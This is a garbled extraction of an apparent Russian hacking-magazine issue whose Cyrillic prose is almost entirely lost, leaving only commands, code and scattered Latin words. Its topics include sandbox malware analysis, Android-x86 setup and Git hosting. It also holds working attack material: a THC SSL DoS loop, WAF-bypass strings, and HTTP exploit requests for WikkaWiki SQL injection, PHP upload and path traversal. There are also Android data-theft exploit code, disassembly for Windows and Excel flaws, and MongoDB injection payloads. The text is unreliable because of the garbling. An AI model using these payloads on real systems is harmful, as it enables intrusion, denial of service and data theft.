, Sandboxie.

, , :
FileRootPath=C:\Sandbox\%SANDBOX%

,
.

.
,
.
,
,
,
,
,
.


Buster Sandbox
Analyzer. -
FileRootPath
, . Buster
Sandbox Analyzer ,
.
BSA

, . Start Analysis.
. ,
, -
,
.
.
?

,
, BSA.

API-, -. ,
Buster Sandbox Analyzer ,
,

Finish Analysis.
, ?
.

, ,


1. Sandboxie
. ,
.
2. API- , ,
. Sandboxie
- . ,

.

,
Sandboxie .
, pp.exe .
Finish
Analysis Buster Sandbox Analyzer.


Malware Analyzer,
. :

C:\Documents and Settings\\Application Data\dplaysvr.exe,
(,
),
190.9.35.199
hosts-. , VirusTotal

, .


Viewer Buster Sandbox Analyzer.
API-,
, ,
.
Reports Buster Sandbox Analyzer.
Report.txt ( View Report),
. ,

, -

http://190.9.35.199/view.php?rnd=787714,

G4FGEXWkb1VANr . .
,
, .
Sandboxie
.
:
drive , ,
user , (%userprofile%).
dplaysvr.exe dplayx.dll, tmp hosts. , ,
:
94.63.240.117 www.google.com
94.63.240.118 www.bing.com

, . , (
),
- , ,
, . , ,
, ,
RegHive.
reg-
:
REG LOAD HKLM\uuusandboxuuu RegHive
REG EXPORT HKLM\uuusandboxuuu sandbox.reg
REG UNLOAD HKLM\uuusandboxuuu
notepad sandbox.reg

, sandbox.reg,
, .
Options Cancel
analysis, . ,

,
. ,
. z


PC ZONE

Ant (a.zhukov@real.xakep.ru)

Android
x86

WWW


ADB



bit.ly/2s9b0J.


ANDROID


?
Android ,
.
. ,
. , ,

Android
PC.

ANDROID-X86
, Android
Google.
.
, ,
Android.
patch hosting for android x86
support. x86-.
, , .
Android-x86 (www.android-x86.org)
. Android-x86, Android, .
Eee
PC, , . ,
( ASUS Eee,
Viewsonic Viewpad 10, Dell Inspiron Mini Duo, Samsung Q1U, Viliv
S5, Lenovo ThinkPad x61 Tablet). Wi-Fi.
, Android , ,
,
, ,
Android,
(,
,
). .

vga=ask


1. . LiveCD.
2. ( android-x86-2.2-r2-asus_laptop.iso),
, VirtualBox
(www.virtualbox.org). :


Android-x86

: Android
: Linux
: Other Linux ( Linux 2.6)
: 512
: 3

3.

4.

5.

6.

Android-x86 DVD-.
.
LiveCD,
.
, Run Android-x86 without
installation.
Android ,
Installation Install Android-x86 to harddisk.
,
. ,
Create/Modify partitions,
cfdisk. (),
,
Bootable. , .

.
ext3, GRUB /
system /. Android, SD-,
. , ,
.
. ,

Android-x86 ( ) . :
debug.
Android-.
,
( Right
Ctrl + I).
-,
Android . ,
, , 4.0
devel, . , - . , ,
. 3.2RC2 , ,
Ethernet,
. Android, .
2.2.


, ? , , .
Android-x86, - ? , Android-x86
Android Market
, Google.
,
Android-. Android-x86 -


. Android-x86
.
,
Youtube . ,
,

Intel HD Audio
. ,
FAQ,
, ICH AC97
VirtualBox (bit.ly/v4H7YQ).


. Android
,
. ,
,
, ,


. .

, GRUB
, Android-

x86 2.2 (HDPI). e


.
,
kernel /android-2.2/kernel /quiet root .....
e
vga=ask. Enter b .

,
. ,
115286432 VESA 34.


GDBSERVER
, Android-x86
GDBserver, /sbin/gdbserver. , GDB
. ,
,
GDBserver:
root@android:/ # gdbserver <VirtualBox ip address>:1234 \
[ ]

Android


:
1.
. Settings Applications
Unknown sources .
, , ,
, .
2. ,
.
.
. Install . ? ,
Android-x86. .
, AndAppStore,
Android-x86. Android Market:
,
.

"--attach pid",
, .

. GDB:
# gdb
:
gdb > target remote <VirtualBox ip address>:1234
!

,
:
1 NAT (
eth0, ).
2 (
eth1, ).


, , Android,
, ,
. , ,
.
,
. Android-
(
), ,

. Ethernet , NAT
.

.
Android x86 ,
. , Settings Configure Ethernet
eth0 dhcp, .
.
, Alt + F1...F6 (Alt + F7
).
:
root@android:/ # netcfg
lo   UP 127.0.0.1 255.0.0.0     0x00000049
eth0 UP 10.0.2.15 255.255.255.0 0x00001043


,
Android-
(, ),
Bluestacks
(bluestacks.com),
AMD. ,
Android,

. ?


, .

,
, .
.
,
HD-ApkHandler.exe
.
Android
( apk-)

. ,
.
, , -
. ,
Angry Birds Fruit Ninja,
BlueStacks ,

.
.


eth1 DOWN 0.0.0.0 0.0.0.0 0x00001002
root@android:/ # netcfg eth1 down
root@android:/ # netcfg eth1 dhcp
action 'dhcp' failed (invalid argument)
root@android:/ # netcfg eth1 up
root@android:/ # netcfg
lo   UP 127.0.0.1      255.0.0.0     0x00000049
eth0 UP 10.0.2.15      255.255.255.0 0x00001043
eth1 UP 192.168.56.101 255.255.255.0 0x00001043

, , :
, .
.


Android SDK
(developer.android.com/sdk/index.html).
1. android-sdk_r16-windows.zip . platform-tools. , . SDK
Manager .
Tool Android SDK Platform-tools. platform-tools,
.
2. ADB. ADB Android Debug Bridge ( ). Google
Linux, . ,
,
, , -,
, -,
.
ADB .


Android.
3. ,
:
adb connect 192.168.56.101

connected to 192.168.56.101:5555


, :
:\android-sdk-windows\platform-tools>adb devices
List of devices attached
emulator-5554          device
192.168.56.101:5555    device

emulator-5554 Google,
192.168.56.101:5555 .
4. Eclipse,
, .

Android-x86?
, . 4.0
, .
3.2 ,
. 2.2
.
:
SDK,
- . ,
Android
, , . z

SHORTCUT

AndAppStore


Windows Home Android;


Esc Android;
F2 Menu;
F3 ;
Alt + F1 ;
Alt + F7 GUI.


PC ZONE



v001, v002
.
,
,
.
,
.

INFO


,
,
,

#12/2011
][
Git&GitHub:
.


? ,


. ,
.


.
,
wiki

SourceForge

. , ,
issue tracker? mediocre,
trac - .
,
: wiki, , . . ,
,
. shell,
FTP SCP.
PHP/Ruby/Python MySQL.

:

. , ,
-

www.sourceforge.net
:
CVS, SVN, Git, Mercurial, Bazaar.
:
.
:
Wiki, bug tracking, code review, , , shell-.
SourceForge
.

_.sourceforge.net, .

-

Google Code
code.google.com/hosting
:
GIT, SVN, Mercurial.
: .
:
code review, wiki, release hosting, issue tracker.
,
Google
SourceForge. .
wiki, issue
tracker .

Assembla
www.assembla.com
:
Git, SVN, Mercurial.
:
.
:
wiki, tickets, code review, ftp, time tracker, build
system.
.
,
.


. ,
, , GitHub
Google Code,
wiki
(
) Sources. issue- .
issue
. , ,
Google.
Gmail.
Google Groups issue tracker'.

Scrum
(
), ,
(Agile).
, :

.
,
wiki, files, messages ( ), ,
,
, ,
. ( )

issue tracker .
, , ,
,
GitHub, . .

SourceForge

. ,
SourceForge
: .
2000
Savannah.
: .

Google Code

, , Google.
: Google .

Assembla

,
: , , time
tracking . .
: .


Bitbucket
bitbucket.org
:
Git, Mercurial.
:


( ).
.
JIRA,
.
Atlassian,
, , . Bitbucket ( )
, GitHub.

GitHub
github.com
:
Git, SVN (git-svn).
:
(300
),
( ), .
:
code review, fork, wiki, issue tracker,
, .
, , . .
- Facebook

CodePlex
www.codeplex.com
:
.
:
Mercurial, TFS (Microsoft Team Foundation
Server).
:
wiki, code review, .
- .Net,
Codeplex.
Microsoft. , ,



Git, Mercurial,
.

:
Mercurial, Git. , - Bitbucket,
(
). GitHub
.

. (
,
), GitHub . ,
review

.
, ,
, ,
- .
.
(diff viewer),

. ,
.
, , ( pull request)
.
Git.
-
, ,
(merge requests).
, ,
,

.
Net. , Visual Studio
,
, CodePlex.
. _.codeplex.com. ,
,

.
,
. . CodePlex

GitHub.
,
-

Bitbucket

review .
Bitbucket
,
- JIRA, REST API
( API GitHub).
: Git Mercurial.

GitHub

. GitHub
review .

,
.
GitHub, , , ,
Git-.
.
: Git .

CodePlex

,
wiki, . , , , ( ),
.
: .Net.


Gitorious
gitorious.org
:
Git.
:
.
:
wiki, code review, .
, Git- .
, GitHub,
. ,
Gitorious
. ,

Kiln
www.fogcreek.com/kiln
:
Mercurial.
: ( 45 ).
:
code review, bug tracker.

Mercurial-, ,
, . .

Launchpad
launchpad.net
:
Bazaar.
:
.
:
code review, bug tracker, faq, answers.

,
Bazaar,
Canonical. , Launchpad .

?
.
, GitHub Bitbucket.
, :

,




(, ).
, ,
, , . , .
,
- review .
wiki
.
blob' ( Git ) .
,
, GitHub: ,
. GitHub

,
,
Git-, SVN-,
Mercurial-.

TortoiseHg,
. Kiln review-, UI .
bug tracker' ,
, FogBugz
(, ).
,
. , Kiln

Gitorious

, Gitorious
. Qt, , ,
.
: Git.

Kiln

, . , ,
.
: Mercurial .

,
, : ,

Ubuntu Linux. ,
Launchpad . , Ubuntu PPA (Personal
Package Archives),

. ,
Lauchpad, Linux-.
, . ,
,
code review

,
.
: Ubuntu.

. GitHub
, Bitbucket .
, .
Net, , CodePlex
Visual Studio.
-

,
,
Google Code.
Ubuntu Linux, LaunchPad.
Assembla Kiln , ,
. :). z

Launchpad


/ EASY HACK

GreenDog , Digital Security (twitter.com/antyurin)

EASY
HACK

, . ,
, .
keep-state, .
, ,
. ,
XYZ ZYX TCP, ,
( ),
.
,
.
, ,
.
, (TCP- SYN-) . , TCP/IP- , RFC
. .
,
TCP- , SYN ( ,
RFC ).
Windows, Linux (, ).
goo.gl/9mu12.
? ,
, , ,
FIN, ACK, RST ( ).
, .
, -


. ,
SYN- , RST-.
, . TCP- SYN + FIN,
, , , ,
. ( )
SYN + ACK, ACK',
, .
, .
,
.
, !

, TCP- SYN-FIN


WORDPRESS

WordPress CMS
. , , ,
, . ,
WordPress , . -

, -
.
, .

,
-. WordPress

WPScan (code.google.com/p/wpscan/).
Ryan Dewhurst.
, , .
-, . -, ( WPScan'
2220) , , . .
:
. ,
. , , ,
, .
. (, Ruby? :))
ruby ./wpscan.rb --url www.example.com --enumerate p

WordPress

--url www.example.com , --enumerate p ,


. , , WordPress WP Security
Scan (goo.gl/Ykcn8).

NMAP


, Nmap (nmap.org).
. Nmap
:
1. nmap (-oN) .
2. gnmap (-oG) grep.
3. xml (-oX) XML.
4. $crIpt KiDDi3 (-oS) leet speak.
, -oA,
.
gnmap,
XML ( ZenMap, ).
-
?
. , , XML,
!
, xmlsoft.org/XSLT/xsltproc.html xsltproc (,
BackTrack), :

.
HTML-. , , ,

XML-.

xsltproc nmap_scan.xml -o nmap_scan.html

nmap XML-,


Nmap


MSF

,
. , ,
, Ruby MSF,
:
msf> use post/windows/gather/enum_domain_tokens
msf enum_domain_tokens> irb
framework.sessions.each_key do |session|
  run_single("set SESSION #{session}")
  print_status("Running #{active_module.fullname} against #{session}")
  run_single("run")
  sleep 1
end

, rc-
:
msf> use post/windows/gather/enum_domain_tokens
msf enum_domain_tokens> resource runall.rc

! .
Jcran' (goo.gl/sIhXf).

DOS SSL

SSL.
SSL Renegotiation vuln
SSLv3/TLS-.
2009 ,
. , ,
renegotiation (
TCP-) ,
.

SSL-.
( ), . ,
. :-)
, ,
THC ,
DoS- SSL (www.thc.org/thc-ssl-dos). (renegotiation)
SSL-.
? . THC , 15 , ,
300 -
. ,
(DSL), .
? . - Vincent Bernat , SSL DoS' (goo.gl/Uqw8o).
,
, , ,
. ,
.
, . THC :
thc-ssl-dos.exe 127.1.1.1 443 --accept

127.1.1.1 IP , 443 -


SSL DoS

( SSL ), --accept
, . :-)
, renegotiation . ,
SSL-,
.
. bash- THC:
thc-ssl-dosit() { while :; do (while :; do echo R; done) |\
openssl s_client -connect 127.1.1.1:443 2>/dev/null; done }\
for x in `seq 1 100`; do thc-ssl-dosit & done

, HTTPS. , SSL (FTPs, POP3s),


. ,
renegotiation',
- IP.
goo.gl/Uqw8o.


WAF

, WAF (web application firewall)


,
OSI.
web-, SQL XSS. WAF
- . , ,
, (, ), WAF' ,
. ,
, , . , WAF.
? .
.
, ,
HTTP RFC,
- -.
, .
HTTP HPP (HTTP Parameter Pollution). ?
. -, ,
, Query String.
?. -,
_=. -,
&
;. ,
(,
urlencode PHP). :
#GET
GET /foo?par1=val1&par2=val2 HTTP/1.1
#POST
POST /foo HTTP/1.1
Content-Length: 19

par1=val1&par2=val2

, HPP
. , ,
RFC, - -. HTTP:

:
ASP ASP.NET ,
(par1=val1,val2,val3);
Apache PHP (par1=val3);
Apache Perl (ARRAY[0x8b9059c]);
Apache Tomcat (par1=val1).
? - .
, ,
, , . HPP
Luca Carettoni Stefano di Paola (goo.gl/9b9lx).
WAF , HPP, ModSecurity ASP:
#
index.aspx?page=select 1,2,3 from table where id=1/
#
index.aspx?page=select 1&page=2,3 from table where id=1

, HPP . 2009 .
HPP-,
Ivan Markovic Network Solution (netsec.rs),
whitepaper HTTP
Parameter Contamination (HPC). ,
.
, RFC, HTTP :
1. , a-z, A-Z, 0-9 and _ . ! ~ * ' ( ).
2. ; / ? : @ & = + $ ,.
,
{ } | \ ^ [ ] `. -
.
.
.
HPC
WAF.
1. ModSecurity. http://localhost/?xp_cmdshell , http://localhost/?xp[cmdshell .
2. dir traversal URLScan. http://192.168.2.105/test.asp?file=../bla.txt , http://192.168.2.105/test.asp?file=.%./bla.txt .

GET /foo?par1=val1&par1=val2&par1=val3 HTTP/1.1

HTTP Parameter Contamination


(ivinside.blogspot.com)
(115612, . , .1)


. ,
, !

WikkaWiki

CVSSV2

7.5
(AV:N/AC:L/Au:N/C:P/I:P/A:P)

BRIEF


WikkaWiki, Egidio Romano aka
EgiX. ,
: , -
.

).
. :
POST /wikka/UserSettings HTTP/1.1
Host: localhost
Cookie: 96522b217a86eca82f6d72ef88c4c7f4=c3u94bo2csludij3v18787i4p6
Content-Length: 140
Content-Type: application/x-www-form-urlencoded
Connection: keep-alive
action=update&email=test%40test.com&
default_comment_display=',email=

EXPLOIT

1. SQL- UPDATE.
/actions/usersettings/usersettings.php, 140-152:
default: // input is valid
    $this->Query("
        UPDATE ".$this->GetConfigValue('table_prefix')."users
        SET email = '".mysql_real_escape_string($email)."',
            doubleclickedit='".mysql_real_escape_string($doubleclickedit)."',
            show_comments='".mysql_real_escape_string($show_comments)."',
            default_comment_display='".$default_comment_display."',
            revisioncount = ".$revisioncount.",
            changescount = ".$changescount.",
            theme = '".mysql_real_escape_string($usertheme)."'
        WHERE name = '".$user['name']."'
        LIMIT 1"
    );

, , ,
mysql_real_escape_string() default_comment_display, ,
SQL-.
users,
, . -,
, -, MySQL
(, /*, */


AfdJoinLeaf


(SELECT sessionid FROM wikka_sessions WHERE


userid='WikiAdmin'),theme='

, ,
UserSettings, e-mail.
( Logout),
, .
magicQuotesWorkaround, magic_quotes_gpc = off.
2. .
/actions/files/files.php, 266-278:
elseif (preg_match('/.+\.('.$allowed_extensions.')$/i', $_FILES['file']['name']))
{
    $strippedname = str_replace('\'','', $_FILES['file']['name']);
    $strippedname = rawurlencode($strippedname);
    $strippedname = stripslashes($strippedname);
    $destfile = $upload_path.DIRECTORY_SEPARATOR.$strippedname;
    if (!file_exists($destfile)) {
        if (move_uploaded_file($_FILES['file']['tmp_name'], $destfile)){
            $notification_msg = T_("File was successfully uploaded.");
        }

'INTRANET_MODE' , , , , PHP-.
$allowed_extensions, . :
'gif|jpeg|jpg|jpe|png|doc|xls|csv|ppt|ppz|pps|pot|pdf|
asc|txt|zip|gtar|gz|bz2|tar|rar|vpp|mpp|vsd|mm|htm|html'

,
MIME- Apache, mm, vpp,

PHP-.
test.php.mm <?php phpinfo(); ?>:
POST /wikka/test HTTP/1.1
Host: localhost
Cookie: 96522b217a86eca82f6d72ef88c4c7f4=upjhsdd5rtc0ib55gv36l0jdt3
Content-Length: 251
Content-Type: multipart/form-data; boundary=--------1503534127
Connection: keep-alive

----------1503534127
Content-Disposition: form-data; name="file"; filename="test.php.mm"
Content-Type: application/octet-stream
<?php phpinfo(); ?>
----------1503534127
Content-Disposition: form-data; name="upload"
Upload
----------1503534127--

3. . -


/handlers/files.xml/files.xml.php

/handlers/files.xml/files.xml.php.
.
, 54, ,
.
Path Traversal
:
http://localhost/wikka/test/files.xml?action=download&file=/../../wikka.config.php

4. .
logSpam() /libs/Wakka.class.php,
1315-1343:
function logSpam($type,$tag,$body,$reason,$urlcount,$user='',$time='')
{
    $spamlogpath = (isset($this->config['spamlog_path'])) ?
        $this->config['spamlog_path'] : DEF_SPAMLOG_PATH;
    if ($user == '')
    {
        $user = $this->GetUserName();
    }
    if ($time == '')
    {
        $time = date('Y-m-d H:i:s');
    }
    if (preg_match('/^mass delete/',$reason))
    {
        $originip = '0.0.0.0';
    }
    else
    {
        $originip = $_SERVER['REMOTE_ADDR'];
    }
    $ua = (isset($_SERVER['HTTP_USER_AGENT'])) ?
        '['.$_SERVER['HTTP_USER_AGENT'].']' : '[?]';
    $body = trim($body);
    $sig = SPAMLOG_SIG.' '.$type.' '.$time.' '.$tag.' - '.
        $originip.' - '.$user.' '.$ua.' - '.$reason.' - '.
        $urlcount."\n";
    $content = $sig.$body."\n\n";
    return $this->appendFile($spamlogpath,$content);
}

spam_logging,
PHP- ,
$spamlogpath ( ./spamlog.txt.php)
$_SERVER['HTTP_USER_AGENT']. ,

:
POST /wikka/test/addcomment HTTP/1.1
Host: localhost
Cookie: 96522b217a86eca82f6d72ef88c4c7f4=6l11flsnvef642oajav0ufnp83
User-Agent: <?php phpinfo(); ?>
Content-Length: 27
Content-Type: application/x-www-form-urlencoded
Connection: keep-alive
body=foo&submit=Add+Comment

fwrite($fp, print_r($_POST, TRUE)) or


die("Couldnt write data to file!");
fclose($fp);
echo "Data uploaded to <a href=\"files.txt\">files.txt</a>!";
}
TARGETS

Android < 2.3.4.


SOLUTION

1. JavaScript .
2. .

TARGETS

WikkaWiki <= 1.3.2.

SOLUTION

Wikka 1.3.2-p7.

CVSSV2


Android

CVSSV2

4.3
(AV:N/AC:M/Au:N/C:P/I:N/A:N)

BRIEF

OC Android
.
. ,

Android.
EXPLOIT

:
1. Android .
2. JavaScript- , .
3. JavaScript- .
, Exploit DB 18164,
.
:
function stage0($scripturl) {
echo "<b>Android < 2.3.4</b><br>Data Stealing Web
Page<br><br>Click: <a href=\"$scripturl?stage=1\">
Malicious Link</a>";
}


JavaScript-,
- com.android.htmlfileprovider:
function stage1($scripturl) {
echo "<body onload=\"setTimeout('window.location
=\'$scripturl?stage=2\'',1000);setTimeout('window.
location=\'content://com.android.htmlfileprovider/
sdcard/download/poc.html\'', 5000);\">";
}

JavaScript- . .
:
function stage3() {
$fp = fopen("files.txt", "w") or
die("Couldnt open file for writing!");


MS11-080:
AFD
7.2
(AV:L/AC:L/Au:N/C:C/I:C/A:C)

BRIEF

,
, Bo Zhou. , afd.sys (ancillary function driver),
, .
,
, .
afd.sys
TCP/IP- tcpip.sys Winsock. NPI
Winsock Kernel (WSK).
EXPLOIT

AfdJoinLeaf.
, ,
afd IOCTL 0x120bb:
PAGEAFD:0001B190 ; __stdcall AfdDispatchDeviceControl(x, x)
...
PAGEAFD:0001B1C4    mov     [edx+1], al
PAGEAFD:0001B1C7    mov     esi, _AfdIrpCallDispatch[esi] ; IOCTL 0x120bb, esi == 0x12270
PAGEAFD:0001B1CD    test    esi, esi
PAGEAFD:0001B1CF    jz      loc_21AF3
PAGEAFD:0001B1D5    call    esi ; call AfdJoinLeaf
...
.data:000121B8 _AfdIrpCallDispatch dd offset @AfdBind@8
.data:000121B8                     ; DATA XREF: AfdDispatchDeviceControl(x,x)
.data:000121B8                     ; AfdBind(x,x)
...
.data:00012270                     dd offset @AfdJoinLeaf@8 ; AfdJoinLeaf(x,x)
...

,
:
0x18;
0;
DWORD
0x00000001;
WORD [ + 0x34],
8, [ 0xC]


JavaScript- Android

PAGE:00016C1D    mov ebx, edx ; IRP Stack
PAGE:00016C1F    mov [ebp+Irp], ecx ; ecx = IRP
PAGE:00016C22    xor esi, esi
PAGE:00016C24    mov [ebp+var_20], esi
PAGE:00016C27    mov [ebp+P], esi
PAGE:00016C2A    mov eax, [ebx+8] ;
PAGE:00016C2D    cmp eax, 18h ; 0x18
PAGE:00016C30    jb loc_170E2
PAGE:00016C36    mov edx, [ebx+4] ;
PAGE:00016C39    cmp edx, esi ; == 0
PAGE:00016C3B    jz short loc_16C46


IRP.
AfdRestartJoin 0x00016f54.
AfdConnectApcKernelRoutine,
NTSTATUS- IRP ( 0xC0000207).
0xC0000207 ,
- 0x000207xx.
TARGETS

Windows XP Service Pack 3, Windows XP Professional x64 Edition


Service Pack 2, Windows Server 2003 Service Pack 2, Windows Server
2003 x64 Edition Service Pack 2, Windows Server 2003 SP2 Itaniumbased-.
SOLUTION

, .

MS11-038 Microsoft Office


Excel,
OBJ

CVSSV2

9.3
(AV:N/AC:M/Au:N/C:C/I:C/A:C)

BRIEF

xls-.
, .
EXPLOIT

OBJ Excel , Line,


Rectangular, CheckBox . .
OBJ-, .
BIFF.
,
, , .
:

OBJ-

ftEnd        00h
()           01h
()           02h
()           03h
ftMacro      04h   Fmla-style macro
ftButton     05h   Command button
ftGmo        06h   Group marker
ftCf         07h   Clipboard format
ftPioGrbit   08h   Picture option flags
ftPictFmla   09h   Picture fmla-style macro
ftCbls       0Ah   Check box link
ftRbo        0Bh   Radio button
ftSbs        0Ch   Scroll bar
ftNts        0Dh   Note structure
ftSbsFmla    0Eh   Scroll bar fmla-style macro
ftGboData    0Fh   Group box data
ftEdoData    10h   Edit control data
ftRboData    11h   Radio button data
ftCblsData   12h   Check box data
ftLbsData    13h   List box data
ftCblsFmla   14h   Check box link fmla-style macro
ftCmo        15h

ftCmo, ftEnd.
ftCmo:

0    ft           2    =ftCmo (15h)
2    cb           2    ftCmo
4    ot           2
6    id           2    ID
8    grbit        2
14   (Reserved)   12   ; == 0

sub_30164E23,
, . , ,
. ,
, sub_3012FABC:
.text:3012FAC8    mov     edi, [ebp+arg_0]
.text:3012FACB    xor     esi, esi
.text:3012FACD    cmp     dword_307E1FB4, esi
.text:3012FAD3    mov     ebx, [edi+6]
.text:3012FAD6    mov     [ebp+var_4], esi
.text:3012FAD9    mov     [ebp+var_4C], esi
.text:3012FADC    mov     [ebp+var_48], esi
.text:3012FADF    mov     [ebp+var_44], esi
.text:3012FAE2    mov     [ebp+var_40], esi
.text:3012FAE5    ja      loc_30274818
.text:3012FAEB    cmp     dword_307DB7A4, esi
.text:3012FAF1    jnz     short loc_3012FAFB
.text:3012FAF3    cmp     ebx, esi
.text:3012FAF5    jnz     loc_30127293
...
.text:30127293    push    dword ptr [ebx+4]
.text:30127296    call    sub_30127263

, ftCmo, edi.
ebx 0x6
. ftCmo,
, , , 12 . , ebx,
.
, ,
0x30127293
ebx+4 . sub_30127263.
, , ebx, .
sub_30127263
( ) 0x10
MSO_804.
.text:30127263    push    ebp
.text:30127264    mov     ebp, esp
.text:30127266    mov     eax, [ebp+arg_0]
.text:30127269    push    esi
.text:3012726A    mov     esi, [eax+0Ah]
.text:3012726D    push    esi
.text:3012726E    call    MSO_804 ;[307D538C]
...

MSO_804 0x3c .
30E27FB0    PUSH EBP
30E27FB1    MOV EBP,ESP
30E27FB3    MOV EAX,DWORD PTR SS:[EBP+8]
30E27FB6    TEST EAX,EAX
30E27FB8    JE mso.30C7A572
30E27FBE    MOV EAX,DWORD PTR DS:[EAX+3C]
30E27FC1    POP EBP
30E27FC2    RETN 4

, MSO_804 ( ) ecx.
call dword ptr [ecx+0x11]...
...
.text:30127274    test    eax, eax
.text:30127276    jz      short loc_3012728E
.text:30127278    mov     ecx, [eax]
.text:3012727A    lea     edx, [ebp+arg_0]
.text:3012727D    push    edx
.text:3012727E    push    0BEh
.text:30127283    push    esi
.text:30127284    push    eax
.text:30127285    call    dword ptr [ecx+11Ch] ; <---
TARGETS

Microsoft Office Excel 2002 10.2614.2625 Service Pack 0 (Office


XP) on Windows XP SP3, Microsoft Office Excel 2002 10.6501.6626
Service Pack 3 (Office XP SP3) on Windows XP SP3.
SOLUTION

, . z


>> coding

DVD




,


.

(blog.chivavas.org)

MongoDB

NOSQL

WWW
www.mongodb.org

MongoDB;
nodejs.org

NodeJS;
ru.wikipedia.org/wiki/NoSQL
NoSQL;
nosql-database.org

NoSQL.

Redis, MongoDB, memcached


, MySQL, Oracle Database MSSQL.
,
. NoSQL-!


MongoDB

NOSQL
, ,
(), .
SQL .
: MySQL, Oracle, Microsoft SQL Server.
, , NoSQL-:
- (Redis, BigTable, memcached);
- (MongoDB, CouchDB);
, (Neo4j, Sones GraphDB);
- (db4o, Cache, Jade);
XML- (eXist, BaseX).
NoSQL- SQL- ,
. , MongoDB
BSON, eXist XQuery, Sones GraphDB
GraphQL, , . NoSQL- , . , ,
SQL-, NoSQL- .
.

NOSQL-?
,
, SQL
SQL-injection. -
: SQL SQL-. , SQL-, ,
. NoSQL ,
,
:
REST- (CSRF);
;
, NoSQL (, MongoDB JavaScript-);
, (SQL , BSON
MongoDB . .), , , .
NoSQL. :
;
API NoSQL;
NoSQL-.
. , .
, .

, , , -
.
:
, ,
, , - .
,
! API. NoSQL
. ,
,
. ,
.
, , API, , ,
.
, , . ,
,
.
, SQL-,
, JSON, JavaScript - .
, !
MongoDB NoSQL-.

NOSQL- MONGODB
web-.
,
( README.RU.txt).
,
http://127.0.0.1:31337. ,
:
;
JSON-;
REST-;
JavaScript-.

.


NoSQL Google Insights


MongoDB, NoSQL-, . ,


Web- MongoDB

, .
MongoDB
$regex. ,
, "ro",
:
db.users.find({ login: { $regex: "^ro" } }).

, MongoDB,
,
bit.ly/cqW1RH.
. web- MongoDB. ,
. mongodb.js Lib.
MongoDbController, -


REST (Representational state transfer)


, ,

, URL. URL,
, .
.
HTTP HTTPS,
: GET (), PUT (), POST
() DELETE ().
BSON (Binary JavaScript Object Notation)

.
JSON
JSON (Binary JSON).

.
regexp:
var regexpPwd = new RegExp("^" + password, "i");
var loginParam = { login: login, password: regexpPwd };

, ,
. password , .
root
, [\s\S]*. MongoDB
: db.users.findOne({login: 'root', password: /^[\s\S]*/i}),
root ( SQL- 1' or 1=1
--). . -,
,
, ,
.
. -,
, . ,
:
db.users.findOne({ login: 'root', password: 'p@ssw0rd' })

, .

JSON-
, MongoDB SQL,
. MongoDB
SQL
JSON (BSON). ,
- (,
). JSON-.
,
JSON-. ,
. ,


. json-injection MongoDbController:
var loginParam = eval("({ login: '" + login + "', password: '" + password + "' })");


JavaScript ( MongoDB) .

.
,
! ,
root'})// ( )
. , ! ? . root'})//, eval :
//
({ login: 'root'})//', password: '' })
//
db.users.findOne({ login: 'root' })

,
JavaScript web. , ' + process.execPath})//

API NoSQL

NoSQL
NoSQL-

/listDatabases?text=1 ;
/serverStatus?text=1 .

db.users.findOne({ login: 'C:\\node.exe' })

Server Side JavaScript


Injections SSJI. ?
1. . ,
^[a-zA-Z]+$.
2. eval JSON. Node.
js JSON.parse,
.

REST-
-
(SOA) REST.
,
REST, RESTful. MongoDB :
REST- . ,
Sleepy Mongoose, REST.
, REST-,
MongoDB. -rest. REST- http://127.0.0.1:28017/.
web-,

. :

REST-
URL :
http://127.0.0.1:28017/_//?
filter_=

REST-
web-
REST- MongoDB.
rest MongoDbController:
var restQry = "/secure_nosql/users/?filter_login="
+ login + "&filter_password=" + password;
var hash = restQry.indexOf("#");
if (hash > -1) { restQry = restQry.substring(0, hash); }

REST-,
#. REST- ,
HTTP- JSON.
, root
secure_nosql : http://127.0.0.1:28017/secure_nosql/users/?filter_login=root&filter_password=p@ssw0rd.
, , #. root#,
. ,
URL: http://localhost:28017/secure_

Mongo MongoDB




, .
JavaScript MongoDB?
1. $where. , db.orders.find({ $where: "this.amount > 3" }) ,
.
2. db.eval. , db.eval("function (x) { return x * x; }", 2) .
3. . MongoDB
, JavaScript, .
system.js. foo(x), :

nosql/users/?filter_login=root#&filter_password=. ,
filter_password
http://localhost:28017/secure_nosql/users/?filter_login=root.
, REST-
(CSRF):
<img src="http://localhost:28017/secure_nosql/users/" />

, RESTful,
. REST.
, Robust Defenses
for Cross-Site Request Forgery (bit.ly/cbVLvY), REST.

JAVASCRIPT-
. Microsoft SQL Server,
ANSI SQL
-.
T-SQL ( SQL,
SQL Server), C#
.NET- .
MongoDB ,
JavaScript. . ,

db.system.js.save({ _id: "foo", value: function (x) { return x * x; } })

: db.eval("foo(2)").
4. Map/Reduce. Map/Reduce , Google
. : map,
, reduce,
.
MongoDB map/reduce .
,
, map
reduce.
MongoDB (bit.ly/4V7mD).
JavaScript- $where db.eval.
c $where.
$where JavaScript. ssji-where MongoDbController:
var js = "this.login === '" + login +
"'&& this.password === '" + password + "'";
var loginParam = { "$where" : js };

, -

FAQ NOSQL
Q


NOSQL?

NoSQL SQL
A (No SQL at all), SQL
(Not only SQL). 1998
: (Carlo
Strozzi)
.
2009-,
(Eric Evans) , ,
.
, NoSQL.


MONGODB?

MongoDB
,
10gen
2007 . MongoDB
2009 .
.

, ,

.
MongoDB
, Disney,
SAP, Forbes .

NOSQL?

,

NoSQL .
1. .
NoSQL
. MongoDB
20000
4800 .
2. .
MongoDB
,
, Oracle.
3. ,
.


. , password
login ,
.
root. root' // .
! ,
MongoDB:

JavaScript
.
,
.
: 85 % .

{ '$where':
'this.login === \'root\' //\' && this.password === \'\'' }

// JavaScript,
this.login === 'root'.
,
, , .
, .
JavaScript db.eval(...).
eval :
var js = "function () { return db.users.findOne ({ login: '"
+ login + "', password: '" + password + "' }); }"
db.eval(js);

,
. pen_test
pen_test. :
'}), db.users.insert({login: 'pen_test', password:
'pen_test'}), 1 } //

-, . -,
pen_test :).

, MongoDB
Map/Reduce
.
4. .
NoSQL-.
,
, ,

.
5. !
NoSQL-
.

.


, NoSQL-. -, ,
NoSQL- ,
: ,
. ,
NoSQL- . -,
NoSQL- .

SQL, , : JSON, XQuery, REST-. , .

SQL- (
MySQL, Oracle SQL Server),
.
,
,
,
(, JavaScript MongoDB).

.
, :

, NoSQL-, , SQL-. z

,
.
,
.
,

,


.

NOSQL?

, NoSQL-
.
, :
, Google,
Amazon Windows Azure Microsoft.

: Facebook,
Twitter, LinkedIn , .
SaaS. Software-as-Service

, . SaaS- NoSQL.
, , Salesforce.com
SaaS CRM.
. ,
.
NoSQL, , -, ,
-,
, .


Johnny Catch

: ?

REMOTE
CONTROL SYSTEM
